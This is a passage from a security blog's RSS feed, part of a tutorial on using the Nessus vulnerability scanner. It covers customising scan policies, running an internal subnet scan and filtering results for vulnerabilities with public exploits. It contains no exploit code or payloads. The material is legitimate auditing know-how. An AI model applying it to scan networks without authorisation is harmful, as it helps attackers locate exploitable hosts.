&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div align="LEFT" style="font-family: inherit; margin-bottom: 0in;"&gt;&lt;b&gt;&lt;span style="font-size: small;"&gt;&lt;span style="color: black;"&gt;&lt;span style="text-decoration: none;"&gt;&lt;span style="font-weight: normal;"&gt;This is not enough and nessus are not bound you within these policies nessus provide a feature to create your own policy according to your requirement of the test. In the figure below demonstrate that I have edited the default policies and even I have created a new policy according to my requirement.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; font-family: inherit; text-align: center;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;a href="http://2.bp.blogspot.com/-3cp1mwE8UKI/T4wsm6iQGYI/AAAAAAAABHg/FKFYnoDh9X0/s1600/Figure+9.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;br /&gt;
&lt;/a&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; font-family: inherit; text-align: center;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;a href="http://4.bp.blogspot.com/-TLkF9lkFPAA/T4wsyj6DlqI/AAAAAAAABH4/PmLbFCpG-Ak/s1600/figure+7.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="230" src="http://4.bp.blogspot.com/-TLkF9lkFPAA/T4wsyj6DlqI/AAAAAAAABH4/PmLbFCpG-Ak/s640/figure+7.jpg" width="640" /&gt;&lt;/a&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; font-family: inherit; text-align: center;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;a href="http://2.bp.blogspot.com/-5MWdQyL7aRQ/T4wsSqT1EtI/AAAAAAAABHA/TEIUTHBMtxM/s1600/Figure+11.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;br /&gt;
&lt;/a&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: inherit;"&gt;&lt;style type="text/css"&gt;
 &lt;!--
  @page { margin: 0.79in }
  P { margin-bottom: 0.08in }
 --&gt;
 
&lt;/style&gt;  &lt;/div&gt;&lt;div align="LEFT" style="font-weight: normal; margin-bottom: 0in; text-decoration: none;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;span style="color: black;"&gt;Now we can easily edit the policies and while editing the policies you can check the best scan type, port scanner and performance.&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;br /&gt;
&lt;div style="font-family: inherit;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;br /&gt;
&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: inherit;"&gt;&lt;style type="text/css"&gt;
 &lt;!--
  @page { margin: 0.79in }
  P { margin-bottom: 0.08in }
 --&gt;
 
&lt;/style&gt;  &lt;/div&gt;&lt;ul&gt;&lt;li&gt;&lt;div align="LEFT" style="font-weight: normal; margin-bottom: 0in; text-decoration: none;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;span style="color: black;"&gt;TCP scan: If you want nessus to scan TCP open  ports than check on this option.&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;/li&gt;
&lt;li&gt;&lt;div align="LEFT" style="font-weight: normal; margin-bottom: 0in; text-decoration: none;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;span style="color: black;"&gt;UDP scan: Same for UDP port scan just mark  check.&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;/li&gt;
&lt;li&gt;&lt;div align="LEFT" style="font-weight: normal; margin-bottom: 0in; text-decoration: none;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;span style="color: black;"&gt;Ping host: Ping is just to test the host is  alive or not&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;/li&gt;
&lt;li&gt;&lt;div align="LEFT" style="font-weight: normal; margin-bottom: 0in; text-decoration: none;"&gt;&lt;span style="font-size: small;"&gt;  &lt;b&gt;&lt;span style="color: black;"&gt;SNMP scan: It will direct nessus to scan  target of SNMP service &lt;/span&gt;&lt;/b&gt;&lt;/span&gt;  &lt;/div&gt;&lt;/li&gt;
&lt;li&gt;&lt;div align="LEFT" style="font-weight: normal; margin-bottom: 0in; text-decoration: none;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;span style="color: black;"&gt;Netstat SSH scan: It will tell nessus to scan  a open port by using Netstat command&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;/li&gt;
&lt;li&gt;&lt;div align="LEFT" style="font-weight: normal; margin-bottom: 0in; text-decoration: none;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;span style="color: black;"&gt;You can set of the port range to scan.&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;/li&gt;
&lt;li&gt;&lt;div align="LEFT" style="font-weight: normal; margin-bottom: 0in; text-decoration: none;"&gt;&lt;span style="font-size: small;"&gt;  &lt;b&gt;&lt;span style="color: black;"&gt;The other setting is very simple but it is a  best practice to remains these default, even you can change the  performance like if you are going to conduct a test on a enterprise  network that has above 100 host than change the maximum host per  scan setting. &lt;/span&gt;&lt;/b&gt;&lt;/span&gt;  &lt;/div&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;div align="LEFT" style="font-weight: normal; margin-bottom: 0in; text-decoration: none;"&gt;&lt;span style="font-size: small;"&gt; &lt;b&gt;&lt;br /&gt;
&lt;/b&gt; &lt;/span&gt;&lt;/div&gt;&lt;div align="LEFT" style="font-weight: normal; margin-bottom: 0in; text-decoration: none;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;span style="color: black;"&gt;The next window is about the credentials.&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;br /&gt;
&lt;div style="font-family: inherit;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;br /&gt;
&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; font-family: inherit; text-align: center;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;a href="http://2.bp.blogspot.com/-3cp1mwE8UKI/T4wsm6iQGYI/AAAAAAAABHg/FKFYnoDh9X0/s1600/Figure+9.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="304" src="http://2.bp.blogspot.com/-3cp1mwE8UKI/T4wsm6iQGYI/AAAAAAAABHg/FKFYnoDh9X0/s640/Figure+9.jpg" width="640" /&gt;&lt;/a&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: inherit;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;br /&gt;
&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div dir="ltr" style="font-family: inherit; text-align: left;" trbidi="on"&gt;&lt;style type="text/css"&gt;
 &lt;!--
  @page { margin: 0.79in }
  P { margin-bottom: 0.08in }
 --&gt;
 
&lt;/style&gt;  &lt;br /&gt;
&lt;div align="LEFT" style="font-weight: normal; margin-bottom: 0in; text-decoration: none;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;span style="color: black;"&gt;You can set the credential type like:&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;ul&gt;&lt;li&gt;&lt;div align="LEFT" style="font-weight: normal; margin-bottom: 0in; text-decoration: none;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;span style="color: black;"&gt;Windows credentials&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;/li&gt;
&lt;li&gt;&lt;div align="LEFT" style="font-weight: normal; margin-bottom: 0in; text-decoration: none;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;span style="color: black;"&gt;SSH settings&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;/li&gt;
&lt;li&gt;&lt;div align="LEFT" style="font-weight: normal; margin-bottom: 0in; text-decoration: none;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;span style="color: black;"&gt;Clear text protocol settings&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;/li&gt;
&lt;li&gt;&lt;div align="LEFT" style="font-weight: normal; margin-bottom: 0in; text-decoration: none;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;span style="color: black;"&gt;More&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;div align="LEFT" style="font-weight: normal; margin-bottom: 0in; text-decoration: none;"&gt;&lt;span style="font-size: small;"&gt; &lt;b&gt;&lt;br /&gt;
&lt;/b&gt; &lt;/span&gt;&lt;/div&gt;&lt;div align="LEFT" style="font-weight: normal; margin-bottom: 0in; text-decoration: none;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;span style="color: black;"&gt;The third window is to set plug ins, nessus contain a wide range of plug ins like :&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;ul&gt;&lt;li&gt;&lt;div align="LEFT" style="font-weight: normal; margin-bottom: 0in; text-decoration: none;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;span style="color: black;"&gt;Backdoors&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;/li&gt;
&lt;li&gt;&lt;div align="LEFT" style="font-weight: normal; margin-bottom: 0in; text-decoration: none;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;span style="color: black;"&gt;CISCO&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;/li&gt;
&lt;li&gt;&lt;div align="LEFT" style="font-weight: normal; margin-bottom: 0in; text-decoration: none;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;span style="color: black;"&gt;CGI scanning&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;/li&gt;
&lt;li&gt;&lt;div align="LEFT" style="font-weight: normal; margin-bottom: 0in; text-decoration: none;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;span style="color: black;"&gt;Web server scanning&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;/li&gt;
&lt;li&gt;&lt;div align="LEFT" style="font-weight: normal; margin-bottom: 0in; text-decoration: none;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;span style="color: black;"&gt;RED HAT&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;/li&gt;
&lt;li&gt;&lt;div align="LEFT" style="font-weight: normal; margin-bottom: 0in; text-decoration: none;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;span style="color: black;"&gt;Windows&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;/li&gt;
&lt;li&gt;&lt;div align="LEFT" style="font-weight: normal; margin-bottom: 0in; text-decoration: none;"&gt;&lt;span style="font-size: small;"&gt;  &lt;b&gt;&lt;span style="color: black;"&gt;SMTP &lt;/span&gt;&lt;/b&gt;&lt;/span&gt;  &lt;/div&gt;&lt;/li&gt;
&lt;li&gt;&lt;div align="LEFT" style="font-weight: normal; margin-bottom: 0in; text-decoration: none;"&gt;&lt;span style="font-size: small;"&gt;  &lt;b&gt;&lt;span style="color: black;"&gt;More &lt;/span&gt;&lt;/b&gt;&lt;/span&gt;  &lt;/div&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;div align="LEFT" style="font-weight: normal; margin-bottom: 0in; text-decoration: none;"&gt;&lt;span style="font-size: small;"&gt; &lt;b&gt;&lt;br /&gt;
&lt;/b&gt; &lt;/span&gt;&lt;/div&gt;&lt;div align="LEFT" style="font-weight: normal; margin-bottom: 0in; text-decoration: none;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;span style="color: black;"&gt;Plug ins are the wonderful feature that will let an auditor to choose the best plug in according to the requirement of the test.&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div align="LEFT" style="font-weight: normal; margin-bottom: 0in; text-decoration: none;"&gt;&lt;span style="font-size: small;"&gt; &lt;b&gt;&lt;br /&gt;
&lt;/b&gt; &lt;/span&gt;&lt;/div&gt;&lt;div align="LEFT" style="font-weight: normal; margin-bottom: 0in; text-decoration: none;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;span style="color: black;"&gt;The last windows is about preferences, now in this point you can choose plugin setting like if you want to conduct an audit on Oracle database than choose oracle setting with oracle SID and so on.&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;br /&gt;
&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;br /&gt;
&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;style type="text/css"&gt;
 &lt;!--
  @page { margin: 0.79in }
  P { margin-bottom: 0.08in }
 --&gt;
 
&lt;/style&gt;  &lt;br /&gt;
&lt;div align="CENTER" style="margin-bottom: 0in;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;span style="color: blue;"&gt;&lt;u&gt;Network Vulnerability Scanning Example Test&lt;/u&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div align="LEFT" style="margin-bottom: 0in; text-decoration: none;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;br /&gt;
&lt;/b&gt; &lt;/span&gt;&lt;/div&gt;&lt;div align="LEFT" style="font-weight: normal; margin-bottom: 0in; text-decoration: none;"&gt;&lt;span style="font-size: small;"&gt; &lt;b&gt;&lt;span style="color: black;"&gt;Now let suppose an auditor have to test the internal network, for this purpose nessus internal network scan policy is the best choice for a test behind a firewall, if you have a default plug in setting than it is a best. Keep in mind that in the internal test enable all the plug ins.  &lt;/span&gt;&lt;/b&gt;&lt;/span&gt; &lt;/div&gt;&lt;div align="LEFT" style="font-weight: normal; margin-bottom: 0in; text-decoration: none;"&gt;&lt;span style="font-size: small;"&gt; &lt;b&gt;&lt;br /&gt;
&lt;/b&gt; &lt;/span&gt;&lt;/div&gt;&lt;div align="LEFT" style="font-weight: normal; margin-bottom: 0in; text-decoration: none;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;span style="color: black;"&gt;On the scan menu add a new scan.&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;br /&gt;
&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;br /&gt;
&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;a href="http://1.bp.blogspot.com/-viMBq6avYsQ/T4wsr5nlRpI/AAAAAAAABHo/2ZnTbKvCYe8/s1600/figure+10.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="318" src="http://1.bp.blogspot.com/-viMBq6avYsQ/T4wsr5nlRpI/AAAAAAAABHo/2ZnTbKvCYe8/s640/figure+10.jpg" width="640" /&gt;&lt;/a&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;br /&gt;
&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;style type="text/css"&gt;
 &lt;!--
  @page { margin: 0.79in }
  P { margin-bottom: 0.08in }
 --&gt;
 
&lt;/style&gt;  &lt;br /&gt;
&lt;div align="LEFT" style="font-weight: normal; margin-bottom: 0in; text-decoration: none;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;span style="color: black;"&gt;Here I am using internal scan policy while in the scan range I have choose all the host from this subnet of class C IP. Launch a scan and it takes some time depending on the number of host.&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div align="LEFT" style="font-weight: normal; margin-bottom: 0in; text-decoration: none;"&gt;&lt;span style="font-size: small;"&gt; &lt;b&gt;&lt;br /&gt;
&lt;/b&gt; &lt;/span&gt;&lt;/div&gt;&lt;div align="LEFT" style="font-weight: normal; margin-bottom: 0in; text-decoration: none;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;span style="color: black;"&gt;Here is the report&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div align="LEFT" style="font-weight: normal; margin-bottom: 0in; text-decoration: none;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;a href="http://2.bp.blogspot.com/-5MWdQyL7aRQ/T4wsSqT1EtI/AAAAAAAABHA/TEIUTHBMtxM/s1600/Figure+11.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="292" src="http://2.bp.blogspot.com/-5MWdQyL7aRQ/T4wsSqT1EtI/AAAAAAAABHA/TEIUTHBMtxM/s640/Figure+11.jpg" width="640" /&gt;&lt;/a&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div align="LEFT" style="font-weight: normal; margin-bottom: 0in; text-decoration: none;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div align="LEFT" style="font-weight: normal; margin-bottom: 0in; text-decoration: none;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;          &lt;/b&gt;&lt;/span&gt;&lt;style type="text/css"&gt;
 &lt;!--
  @page { margin: 0.79in }
  P { margin-bottom: 0.08in }
 --&gt;
 
&lt;/style&gt;  &lt;/div&gt;&lt;div align="LEFT" style="font-weight: normal; margin-bottom: 0in; text-decoration: none;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;span style="color: black;"&gt;It shows that there is a four host alive and they contain a lot of vulnerabilities even some vulnerabilities  are at high risk but keep in mind that all the exploits against a vulnerability is not available on public, so how to check the available exploit against a vulnerability? It is very simple from the left side below click on show filter than mark a check on exploit exist.&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;&amp;nbsp; &lt;span style="color: black;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;a href="http://1.bp.blogspot.com/-aBrTT4CJ9Ms/T4wsYjz3XLI/AAAAAAAABHI/z_jneYu9TBc/s1600/Figure+12.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="354" src="http://1.bp.blogspot.com/-aBrTT4CJ9Ms/T4wsYjz3XLI/AAAAAAAABHI/z_jneYu9TBc/s640/Figure+12.jpg" width="640" /&gt;&lt;/a&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div align="LEFT" style="font-weight: normal; margin-bottom: 0in; text-decoration: none;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;br /&gt;
&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div align="LEFT" style="font-weight: normal; margin-bottom: 0in; text-decoration: none;"&gt;&lt;style type="text/css"&gt;
 &lt;!--
  @page { margin: 0.79in }
  P { margin-bottom: 0.08in }
 --&gt;
 
&lt;/style&gt;  &lt;/div&gt;&lt;div align="LEFT" style="font-weight: normal; margin-bottom: 0in; text-decoration: none;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;span style="color: black;"&gt;Now the exploits of these vulnerabilities are available in public and we can see the detail of this exploits like CVE information, vulnerability publication date and more information.&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div align="LEFT" style="font-weight: normal; margin-bottom: 0in; text-decoration: none;"&gt;&lt;span style="font-size: small;"&gt; &lt;b&gt;&lt;br /&gt;
&lt;/b&gt; &lt;/span&gt;&lt;/div&gt;&lt;div align="LEFT" style="font-weight: normal; margin-bottom: 0in; text-decoration: none;"&gt;&lt;span style="font-size: small;"&gt; &lt;b&gt;&lt;br /&gt;
&lt;/b&gt; &lt;/span&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;a href="http://1.bp.blogspot.com/-WD2wkOHTCJo/T4wsh9f344I/AAAAAAAABHY/aGgzTaiegO0/s1600/Figure+14.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="324" src="http://1.bp.blogspot.com/-WD2wkOHTCJo/T4wsh9f344I/AAAAAAAABHY/aGgzTaiegO0/s640/Figure+14.jpg" width="640" /&gt;&lt;/a&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div align="LEFT" style="font-weight: normal; margin-bottom: 0in; text-decoration: none;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt; &lt;/b&gt;&lt;/span&gt; &lt;/div&gt;&lt;div align="LEFT" style="font-weight: normal; margin-bottom: 0in; text-decoration: none;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt; &lt;/b&gt;&lt;/span&gt;          &lt;style type="text/css"&gt;
 &lt;!--
  @page { margin: 0.79in }
  P { margin-bottom: 0.08in }
 --&gt;
 
&lt;/style&gt;  &lt;/div&gt;&lt;div align="LEFT" style="font-weight: normal; margin-bottom: 0in; text-decoration: none;"&gt;&lt;span style="font-size: small;"&gt; &lt;b&gt;&lt;span style="color: black;"&gt;Lets call a result of Zenmap you can integrate nmap (zenmap) result into nessus for the maximum performance that is why I have discussed zenmap before. On the scan windows of nessus simply browse the target file and import nmap result into nessus. &lt;/span&gt;&lt;/b&gt;&lt;/span&gt; &lt;/div&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt; &lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;div align="LEFT" style="font-weight: normal; margin-bottom: 0in; text-decoration: none;"&gt;&lt;span style="font-size: small;"&gt; &lt;b&gt;&lt;br /&gt;
&lt;/b&gt; &lt;/span&gt;&lt;/div&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt; &lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;div align="LEFT" style="font-weight: normal; margin-bottom: 0in; text-decoration: none;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;span style="color: black;"&gt;Its all done and I hope you have enjoyed it.&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt; &lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;div align="LEFT" style="font-weight: normal; margin-bottom: 0in; text-decoration: none;"&gt;&lt;span style="font-size: small;"&gt; &lt;b&gt;&lt;br /&gt;
&lt;/b&gt; &lt;/span&gt;&lt;/div&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt; &lt;/b&gt;&lt;/span&gt; &lt;br /&gt;
&lt;span style="font-size: small;"&gt;&lt;b&gt; &lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-size: small;"&gt;&lt;b&gt; &lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;br /&gt;
&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;div&gt;&lt;script src="http://connect.facebook.net/en_US/all.js#xfbml=1"&gt;
&lt;/script&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;fb:like href="http://www.ehacking.net/" show_faces="true" width="450"&gt;&lt;/fb:like&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="color: red;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;Note: If you want to learn more about Linux and Windows based Penetration testing, you might want to subscribe our &lt;a href="http://feeds.feedburner.com/ehacking"&gt;RSS feed&lt;/a&gt; and &lt;a href="http://feedburner.google.com/fb/a/mailverify?uri=ehacking&amp;amp;loc=en_US"&gt;Email Subscription&lt;/a&gt;&amp;nbsp; or become our &lt;a href="http://www.facebook.com/Beautyofthebaud"&gt;Facebook fan&lt;/a&gt;! You will get all the latest updates at both the places.&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3964176871415674890-5298045232263836490?l=www.ehacking.net' alt='' /&gt;&lt;/div&gt;&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=5ePSMpgFD_s:YaaoXvAyNto:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=5ePSMpgFD_s:YaaoXvAyNto:-BTjWOF_DHI"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?i=5ePSMpgFD_s:YaaoXvAyNto:-BTjWOF_DHI" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=5ePSMpgFD_s:YaaoXvAyNto:63t7Ie-LG7Y"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?d=63t7Ie-LG7Y" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=5ePSMpgFD_s:YaaoXvAyNto:V_sGLiPBpWU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?i=5ePSMpgFD_s:YaaoXvAyNto:V_sGLiPBpWU" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=5ePSMpgFD_s:YaaoXvAyNto:F7zBnMyn0Lo"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?i=5ePSMpgFD_s:YaaoXvAyNto:F7zBnMyn0Lo" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=5ePSMpgFD_s:YaaoXvAyNto:gIN9vFwOqvQ"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?i=5ePSMpgFD_s:YaaoXvAyNto:gIN9vFwOqvQ" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=5ePSMpgFD_s:YaaoXvAyNto:qj6IDK7rITs"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?d=qj6IDK7rITs" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=5ePSMpgFD_s:YaaoXvAyNto:TzevzKxY174"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?d=TzevzKxY174" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=5ePSMpgFD_s:YaaoXvAyNto:7Q72WNTAKBA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?d=7Q72WNTAKBA" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/ehacking/~4/5ePSMpgFD_s" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/ehacking/~3/5ePSMpgFD_s/vulnerability-assessment-scanning.html</link><author>noreply@blogger.com (Irfan Shakeel)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://3.bp.blogspot.com/-fgHNjj5Xb5w/T4w2wiRltAI/AAAAAAAABII/jevlr_f5zEU/s72-c/nessus.jpg" height="72" width="72" /><thr:total>0</thr:total><feedburner:origLink>http://www.ehacking.net/2012/04/vulnerability-assessment-scanning.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-3964176871415674890.post-8557141759079434616</guid><pubDate>Fri, 13 Apr 2012 14:47:00 +0000</pubDate><atom:updated>2012-04-13T07:47:43.383-07:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">News</category><category domain="http://www.blogger.com/atom/ns#">Web Security</category><category domain="http://www.blogger.com/atom/ns#">Open Source</category><category domain="http://www.blogger.com/atom/ns#">Vulnerability</category><category domain="http://www.blogger.com/atom/ns#">EH Tools</category><category domain="http://www.blogger.com/atom/ns#">Random</category><title>web-sorrow Web Server Scanner &amp; Enumeration</title><description>&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/AL7ldCe-88IxYyhevhLBRs5U8A4/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/AL7ldCe-88IxYyhevhLBRs5U8A4/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
